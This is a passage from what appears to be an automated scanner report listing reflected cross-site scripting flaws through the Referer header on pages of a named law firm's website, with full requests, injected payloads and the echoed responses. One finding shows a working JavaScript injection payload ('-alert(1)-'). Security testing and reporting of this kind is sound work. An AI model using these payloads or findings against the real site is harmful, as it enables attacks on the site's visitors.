User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=d86c8"><a>12209855120

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:26:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=d86c8"><a>12209855120">
...[SNIP]...

2.233. http://www.arnoldporter.com/advisory.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /advisory.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c51"><a>3e7a64ab71 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /advisory.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=47c51"><a>3e7a64ab71

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Advisory Sign-Up</title>
       <meta name="Description"
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=47c51"><a>3e7a64ab71">
...[SNIP]...

2.234. http://www.arnoldporter.com/careers.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /careers.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f57f0"><a>27be33cf6b9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /careers.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=f57f0"><a>27be33cf6b9

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:26:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=f57f0"><a>27be33cf6b9">
...[SNIP]...

2.235. http://www.arnoldporter.com/contact.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /contact.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5a4c"><a>7d008f3eaa6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /contact.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=f5a4c"><a>7d008f3eaa6

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Contact Us</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=f5a4c"><a>7d008f3eaa6">
...[SNIP]...

2.236. http://www.arnoldporter.com/events.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /events.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e8d2"><a>935e63f487b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /events.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=1e8d2"><a>935e63f487b

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Seminars/Events</title>
       <meta name="Description"
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=1e8d2"><a>935e63f487b">
...[SNIP]...

2.237. http://www.arnoldporter.com/events.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /events.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d1f7'-alert(1)-'2b3427d18c5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events.cfm?id=670&action=view HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=5d1f7'-alert(1)-'2b3427d18c5

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Natural Resource Damages: The Ground, Groundwater an
...[SNIP]...
d_capture_file).click(function() {
                   $.post("process_user_capture.cfm",
                       { name: name,
                        company: company,
                        email: email,
                        from: 'http://www.google.com/search?hl=en&q=5d1f7'-alert(1)-'2b3427d18c5',
                        document: $(this).attr('id').replace('doc', '')
                        },
                       function(data) {
                        }, "json");
                });
               if (requested_capture_forward == '') {
                   setTimeout('$("#doc" + r
...[SNIP]...

2.238. http://www.arnoldporter.com/experience.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /experience.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 685f0"><a>2390de3ec9b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /experience.cfm?action=case_study HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=685f0"><a>2390de3ec9b

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Experience</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=685f0"><a>2390de3ec9b">
...[SNIP]...

2.239. http://www.arnoldporter.com/global_reach.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /global_reach.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3530c"><a>dd14a6ab469 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /global_reach.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=3530c"><a>dd14a6ab469

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Global Reach</title>
       <meta name="Description" con
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=3530c"><a>dd14a6ab469">
...[SNIP]...

2.240. http://www.arnoldporter.com/globals_disclaimer.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_disclaimer.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd76e"><a>5d9b079dc37 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_disclaimer.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=dd76e"><a>5d9b079dc37

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=dd76e"><a>5d9b079dc37">
...[SNIP]...

2.241. http://www.arnoldporter.com/globals_llp_status.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_llp_status.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c77c2"><a>9d93e2dce00 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_llp_status.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=c77c2"><a>9d93e2dce00

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=c77c2"><a>9d93e2dce00">
...[SNIP]...

2.242. http://www.arnoldporter.com/globals_non_discrimination.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_non_discrimination.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92616"><a>de3dc2ef1b7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_non_discrimination.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=92616"><a>de3dc2ef1b7

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=92616"><a>de3dc2ef1b7">
...[SNIP]...

2.243. http://www.arnoldporter.com/globals_operating_status.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_operating_status.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca343"><a>0d72f0518a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_operating_status.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=ca343"><a>0d72f0518a2

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=ca343"><a>0d72f0518a2">
...[SNIP]...

2.244. http://www.arnoldporter.com/globals_privacy_policy.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_privacy_policy.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313f3"><a>936b59feb4b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_privacy_policy.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=313f3"><a>936b59feb4b

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=313f3"><a>936b59feb4b">
...[SNIP]...

2.245. http://www.arnoldporter.com/globals_statement_clients_rights.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_statement_clients_rights.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92192"><a>3d473dc6629 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_statement_clients_rights.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=92192"><a>3d473dc6629

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=92192"><a>3d473dc6629">
...[SNIP]...

2.246. http://www.arnoldporter.com/home.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /home.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2235a"><a>2aadc693209 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=2235a"><a>2aadc693209

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=2235a"><a>2aadc693209">
...[SNIP]...

2.247. http://www.arnoldporter.com/industries.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /industries.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b3e"><a>0cbb16e6270 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

